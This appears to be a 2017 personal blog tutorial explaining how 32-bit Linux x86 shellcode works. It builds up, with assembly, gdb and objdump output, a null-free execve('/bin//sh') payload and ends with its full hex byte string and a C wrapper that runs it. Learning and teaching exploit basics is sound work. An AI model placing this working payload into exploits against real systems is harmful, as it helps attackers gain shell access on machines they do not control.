Shellcode for/by a Newbie

02 Sep 2017 ~14 minutes

I wrote this blog post with a simple goal in mind: I never took the time to understand fully how a shellcode worked. I know about it, I know that it works, but I don’t know how. So I made myself write this in order to finally grasp its logic. Ready? Let’s dig in!

For this article I’m using a Ubuntu Trusty 32bits (with Vagrant).

The wrapper

In order to execute a shellcode, we’re going to use a simple wrapper, written in C . Later in the blog post, I’ll assume that only shellcode changes, so I’ll only reference it.

// shellcode.c const char shellcode [] = "/* shellcode here */" ; int main (){ ( * ( void ( * )()) shellcode )(); return 0 ; }

Let’s study this line:

( * ( void ( * )() ) shellcode )();

The (...)(); wrap the function definition and calls it, we could have done something like:

void function = (...) function ();

Next:

void ( * )()

This is the function pointer definition, it’s saying:

Define a function without name, without argument and without return value.

And finally:

* (...) shellcode

This will tell what are the instructions to execute when the function is called.

Let’s do a simple example:

shellcode = " \x90\x90\x90\x90 " ;

Just 4 NOP operations, let’s compile and

$ gcc -o shellcode shellcode.c $ gdb -q ./shellcode Reading symbols from ./shellcode...(no debugging symbols found)...done. (gdb) disass main Dump of assembler code for function main: 0x080483ed <+0>: push %ebp 0x080483ee <+1>: mov %esp,%ebp 0x080483f0 <+3>: and $0xfffffff0,%esp 0x080483f3 <+6>: mov $0x80484a0,%eax 0x080483f8 <+11>: call *%eax 0x080483fa <+13>: mov $0x0,%eax 0x080483ff <+18>: leave 0x08048400 <+19>: ret End of assembler dump. (gdb) x/4i 0x80484a0 0x80484a0 <shellcode>: nop 0x80484a1 <shellcode+1>: nop 0x80484a2 <shellcode+2>: nop 0x80484a3 <shellcode+3>: nop

The interesting part here is to notice

0x080483f3 <+6>: mov $0x80484a0,%eax 0x080483f8 <+11>: call *%eax

This is setting the address of our shellcode into $eax and calling it. This call instruction will jump to the first instruction at the specified address. This won’t work with the current shellcode, it’s just to show the flow of the wrapper.

Spawning a shell

Our main exercise here will be to spawn a shell, it is a straightforward, yet powerful, way to control a machine. While techniques to have the shellcode in memory are numerous, it’s not our focus here, I recommend you read the references links provided. We’ll assume that we can execute the shellcode, and we’re only interested in its underlying mechanism.

In C, to spawn a shell there are different methods, you can use the system function, e.g.:

system ( "/bin/sh" );

Another solution is to use execve:

execve ( "/bin/sh" , argv , envp );

We will look at execve , because it replaces the current process and is simpler than system (see differences here and here).

Execve in ASM

To call execve we will use the famous int 0x80 which transfer the flow of the program to the kernel to execute the defined system call. (c.f.).

int 0x80 requires the interrupt number in the $eax register, to find the one we want we can run:

$ cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep execve #define __NR_execve 11

We can already write the last two instructions of our shellcode:

... mov eax, 0xb int 0x80

Now we need to study how execve works to setup the correct elements on the stack, here is the function definition:

int execve ( const char * filename , char * const argv [], char * const envp []);

The first argument is a string, or as C likes to call it “a one-dimensional array of characters terminated by a null character”. The second and third arguments are arrays of strings. The first one is the list of arguments the program will receive, for example:

// execve_ls.c int main (){ char * filename = "/bin/ls" ; char * argv [ 3 ]; argv [ 0 ] = "/bin/ls" ; argv [ 1 ] = "/" ; argv [ 2 ] = 0 ; execve ( filename , argv , 0 ); return 0 ; }

The first argument of argv is by convention started with the name of the current filename being executed.

$ gcc -o execve_ls execve_ls.c $ ./execve_ls bin dev home lib media opt root sbin sys usr var ...

Now we’re interested in /bin/sh and not /bin/ls , but it works just the same. We can actually removes the argv and envp from our test:

// execve_sh.c int main (){ execve ( "/bin/sh" , 0 , 0 ); return 0 ; }

$ gcc -o execve_sh execve_sh.c $ ./execve_sh $ exit # the new shell $

Note that in the following shellcode, we’ll explicitly set argv (and its corresponding register ecx ) to 0 , otherwise it’ll try to read from the pointed address and can cause troubles.

Stack and register

Before going any further I need to introduce a concept: the calling convention. Depending on your kernel, how function calling works may change. The two main ways of doing that are:

Pass every argument on the stack

Pass some argument on registers (FastCall)

It’s important to know what to do, because you may not have the right kernel for the right calling convention. The compiler usually makes that transparent for you, but because we’re doing our ASM by hand, we need to know which one works.

Simple example, using the registers to call exit (syscall 1 ) with the return value 1 :

// exit.asm section .text global _start _start: mov eax, 1 mov ebx, eax int 0x80

$ nasm -f elf exit.asm && ld -o exit exit.o $ ./exit $ echo $? 1

Now with the stack:

// exit.asm section .text global _start _start: push 1 push 1 int 0x80

$ nasm -f elf exit.asm && ld -o exit exit.o $ ./exit Segmentation fault ( core dumped )

For this example we’ll use the Fastcall convention, but it can be adapted easily.

String’s address

This is an interesting part of the shellcode building. We know the string we want to reference, and we need to get its address somehow. We could store the string in the environment variables, or somewhere else in the program’s memory, but it would be quite random to access it. Instead, we want to store the string inside the shellcode.

Let’s see two techniques to do that:

Call

The call instruction ASM is commonly used to jump to another part of the program’s flow, but in addition to that, it pushes the next instruction’s address into the stack. To place bytes into the shellcode, we can use the db commands which places that bytes in the executable:

// call_example.asm section .text global _start _start: jmp toCall main: pop eax ; eax now contains the string address ; ... toCall: call main db "/bin/sh"

$ nasm -f elf call_example.asm $ ld -o call_example call_example.o $ gdb -q call_example Reading symbols from call_example...(no debugging symbols found)...done. (gdb) disass toCall Dump of assembler code for function toCall: 0x08048063 <+0>: call 0x8048062 <main> 0x08048068 <+5>: das 0x08048069 <+6>: bound %ebp,0x6e(%ecx) 0x0804806c <+9>: das 0x0804806d <+10>: jae 0x80480d7 End of assembler dump. (gdb) x/s 0x08048068 0x8048068 <toCall+5>: "/bin/sh"<error: Cannot access memory at address 0x804806f> (gdb) disass main Dump of assembler code for function main: 0x08048062 <+0>: pop %eax End of assembler dump. (gdb) b *0x08048062 Breakpoint 1 at 0x8048062 (gdb) r Starting program: /home/n4/learning/call_example Breakpoint 1, 0x08048062 in main () (gdb) x/wx $esp 0xbffff74c: 0x08048068 (gdb) ni 0x08048063 in toCall () (gdb) x $eax 0x8048068 <toCall+5>: 0x6e69622f (gdb) x/s $eax 0x8048068 <toCall+5>: "/bin/sh"

Here you can see we can access the string from eax , and the strange instructions in toCall are just gdb interpreting the string as instructions:

0x08048068 <+5>: das 0x08048069 <+6>: bound %ebp,0x6e ( %ecx ) 0x0804806c <+9>: das 0x0804806d <+10>: jae 0x80480d7

Push & Save ESP

Another technique is to push the string to the stack and get back the value of $esp after this operation. As you saw previously:

( gdb ) x $eax 0x8048068 <toCall+5>: 0x6e69622f ( gdb ) x/s $eax 0x8048068 <toCall+5>: "/bin/sh"

In memory we don’t store the string, but rather the numeric representation of the string. The computer doesn’t care how we add the data in memory, so we could just push data directly to the stack:

0x8048068 <toCall+5>: "/bin/sh" ( gdb ) x/2xw $eax 0x8048068 <toCall+5>: 0x6e69622f 0x0068732f

You can see already that we have a 0x00 byte here, which is never a good idea in an exploit string (because it represents the end of a string, so it could cut the string in half). Instead we can use //bin/sh or /bin//sh which are both valid:

(gdb) print /x "/bin//sh" $2 = {0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, 0x0}

So our two values are: 0x6e69622f and 0x68732f2f . We need to push the second one before, because the second one to be pushed will be the first to be read (the stack is a LIFO):

// push_example.asm section .text global _start _start: push 0x68732f2f push 0x6e69622f mov eax, esp

You can see, once we pushed those values in the stack, $esp will point to the string, so we can store it somewhere else. Let’s look at that under gdb :

$ nasm -f elf push_example.asm $ ld -o push_example push_example.o $ gdb -q push_example Reading symbols from push_example...(no debugging symbols found)...done. (gdb) disass _start Dump of assembler code for function _start: 0x08048060 <+0>: push $0x68732f2f 0x08048065 <+5>: push $0x6e69622f 0x0804806a <+10>: mov %esp,%eax End of assembler dump. (gdb) b *0x0804806a Breakpoint 1 at 0x804806a (gdb) r Starting program: /home/n4/learning/push_example Breakpoint 1, 0x0804806a in _start () (gdb) x/4wx $esp 0xbffff748: 0x6e69622f 0x68732f2f 0x00000001 0xbffff88b (gdb) x/s $esp 0xbffff748: "/bin//sh\001" (gdb) ni 0x0804806c in ?? () (gdb) x $eax 0xbffff748: "/bin//sh\001"

So you can see we successfully got the address of the string in $eax again.

Quick note: because the following memory byte was not null, it was taken as being part of the string, we’ll need to fix that later, by pushing 0 to the stack first.

Writing the shellcode

We’re going to use the second method, which is simpler and shorter to write. When writing a shellcode, because you’re trying to overflow memory you aren’t supposed to use, it’s always a good idea to have the shortest payload possible.

Pseudo-ASM

Let’s go back to our interrupt and move up to what we need to have in the registers:

push 0 push string push 0 mov ebx, string_address mov ecx, 0 mov eax, 0xb int 0x80

We can already replace a few instructions:

push 0 push 0x68732f2f push 0x6e69622f push 0 mov ebx, string_address mov ecx, 0 mov eax, 0xb int 0x80

Now every time we push something on the stack $esp changes, so we need to get its value right after the string:

// shellcode.asm section .text global _start _start: push 0 push 0x68732f2f push 0x6e69622f mov eax, esp push 0 mov ebx, eax mov ecx, 0 mov eax, 0xb int 0x80

And we have it! Let’s try this now:

$ nasm -f elf shellcode.asm && ld -o shellcode shellcode.o $ ./shellcode $ exit $

Shellcode cleanup

Nice! Let’s have a look at our shellcode with objdump :

shellcode: file format elf32-i386 Contents of section .text: 8048060 6a00682f 2f736868 2f62696e 89e06a00 j.h//shh/bin..j. 8048070 89c3b900 000000b8 0b000000 cd80 ..............

That’s quite nice, but there are a few 00 here, let’s have a closer look:

$ objdump -d shellcode shellcode: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: 6a 00 push $0x0 8048062: 68 2f 2f 73 68 push $0x68732f2f 8048067: 68 2f 62 69 6e push $0x6e69622f 804806c: 89 e0 mov %esp,%eax 804806e: 6a 00 push $0x0 8048070: 89 c3 mov %eax,%ebx 8048072: b9 00 00 00 00 mov $0x0 ,%ecx 8048077: b8 0b 00 00 00 mov $0xb ,%eax 804807c: cd 80 int $0x80

So we have twice a problem with push 0x0 , and once with mov 0xb, eax .

Push

We can’t have any 0 displayed in the asm code, but we have a few cards in our hand. Using a register, and making sure it’s empty, we can then push its value onto the stack. One of the simplest way is to use the xor command like so:

xor eax, eax

This will xor eax with itself and thus put 0 into this register, we can now push it to the stack:

xor eax, eax push eax

We need to the other one but we have a problem: we’re changing eax value, so we can’t push it again.

If you look closely you can see that we can optimize our shellcode while solving this problem:

mov eax, esp push 0 mov ebx, eax

Is changed to:

mov ebx, esp push eax

We never really needed to move esp to eax if it was to move it to ebx later. Shorter code!

Mov

Firstly, we want to set ecx to 0 , the easiest way is to xor it, as we saw previously.

Now we want to set eax to 11 , but the mov command will actually modify the full 4 bytes of the register, and needs to specify the 4 bytes (see the 3 00 and the unique 0b ).

We could inc eax 11 times, but that would be really long!

Instead we can use the al register, which is the last 8 bits of the eax register:

64 32 16 8 0 [AH][AL] [EAX ] [RAX ]

So with all that, we can just replace

mov eax, 11

with

mov al, 11

And here’s the final payload

section .text global _start _start: xor eax, eax push eax push 0x68732f2f push 0x6e69622f mov ebx, esp xor ecx, ecx mov al, 0xb int 0x80

It’s a little bit shorter than the previous one, but the real occurs when you look at the generated shellcode:

$ objdump -s shellcode shellcode: file format elf32-i386 Contents of section .text: 8048060 31c05068 2f2f7368 682f6269 6e89e331 1.Ph//shh/bin..1 8048070 c9b00bcd 80 .....

Wrapping up

We have our hex instructions, let’s put that in our wrapper. Here’s a swift way to convert your hex string to the proper format with vim:

31c050682f2f7368682f62696e89e331c9b00bcd80 :s/\(..\)/\\x\1/g \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80

shellcode = " \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80 " ;

$ gcc -o shellcode shellcode.c $ ./shellcode $ # new shell

References: